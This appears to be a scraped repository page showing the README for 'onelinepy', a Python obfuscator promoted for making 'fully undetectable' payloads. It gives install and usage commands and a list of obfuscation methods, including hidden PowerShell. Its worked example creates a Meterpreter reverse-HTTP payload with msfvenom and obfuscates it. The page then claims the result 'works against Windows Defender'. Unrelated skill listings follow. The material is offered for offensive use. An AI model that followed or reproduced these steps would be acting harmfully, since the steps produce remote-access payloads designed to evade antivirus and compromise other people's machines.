Onelinepy
Python Obfuscator to generate One-Liners and FUD Payloads.
Install / Use
/learn @spicesouls/OnelinepyREADME
onelinepy
Python Obfuscator for FUD Python Code.
<img src='oneline.png' />Download & Run
git clone https://github.com/spicesouls/onelinepy
cd onelinepy
chmod +x setup.sh
./setup.sh
onelinepy
Usage Guide
<pre> <b> _ _ </b> <b> ___ ___ ___| |_|___ ___</b><font color="#FFE82C"><b> ___ _ _</b></font> <b> | . | | -_| | | | -_</b><font color="#FFE82C"><b>| . | | |</b></font><b> </b><font color="#FFE82C"><b>Python</b></font> <b> |___|_|_|___|_|_|_|_|___</b><font color="#FFE82C"><b>| _|_ |</b></font><b> </b><font color="#729FCF"><b>Obfuscator</b></font> <b> </b><font color="#FFE82C"><b>|_| |___|</b></font> <b>usage: oneline.py [-h] [-m M] [-i I] [--script SCRIPT] [--code CODE] [--list] [--output OUTPUT]</b> <b>optional arguments:</b> <b> -h, --help show this help message and exit</b> <b> -m M Obfuscating Method (i.e, -m /one_line/base64)</b> <b> -i I Iterations For Obfuscation.</b> <b> --script SCRIPT File path of Python file to Obfuscate.</b> <b> --code CODE Python code to Obfuscate.</b> <b> --list List Obfuscating Methods.</b> <b> --output OUTPUT Output File.</b> </pre>Example: Creating FUD Meterpreter Python Payload
- Generate Python Payload:
msfvenom --payload python/meterpreter_reverse_http LHOST=... LPORT=... > payload.txt
- Obfuscate Payload
onelinepy -m /one_line/base64 --script payload.txt -i 3 --output obfuscated_payload.txt
- Profit! The Obfuscated Payload works against Windows Defender.
More Examples
onelinepy -m /one_line/base64 --script payload.py -i 3
onelinepy -m /one_line/hex --code "print('HEX!')"
Obfuscation Method List
<pre><b> _ _ </b> <b> ___ ___ ___| |_|___ ___</b><font color="#FFE82C"><b> ___ _ _</b></font> <b> | . | | -_| | | | -_</b><font color="#FFE82C"><b>| . | | |</b></font><b> </b><font color="#FFE82C"><b>Python</b></font> <b> |___|_|_|___|_|_|_|_|___</b><font color="#FFE82C"><b>| _|_ |</b></font><b> </b><font color="#729FCF"><b>Obfuscator</b></font> <b> </b><font color="#FFE82C"><b>|_| |___|</b></font> <b> Obfuscators ( * = May cause Syntax Errors )</b> <b> -=============-</b> <b> 0</b> <b>/one_line/hex</b> <b> 1</b> <b>/one_line/base64</b> <b> 2</b> <b>/one_line/base32</b> <b> 3</b> <b>/one_line/gunzip*</b> <b> 4</b> <b>/one_line/rot13*</b> <b> 5</b> <b>/cmd/command</b> <b> 6</b> <b>/cmd/powershell</b> <b> 7</b> <b>/cmd/powershellhidden</b></pre>Related Skills
node-connect
336.5kDiagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps
claude-opus-4-5-migration
82.9kMigrate prompts and code from Claude Sonnet 4.0, Sonnet 4.5, or Opus 4.1 to Opus 4.5
frontend-design
82.9kCreate distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.
model-usage
336.5kUse CodexBar CLI local cost usage to summarize per-model usage for Codex or Claude, including the current (most recent) model or a full model breakdown. Trigger when asked for model-level usage/cost data from codexbar, or when you need a scriptable per-model summary from codexbar cost JSON.
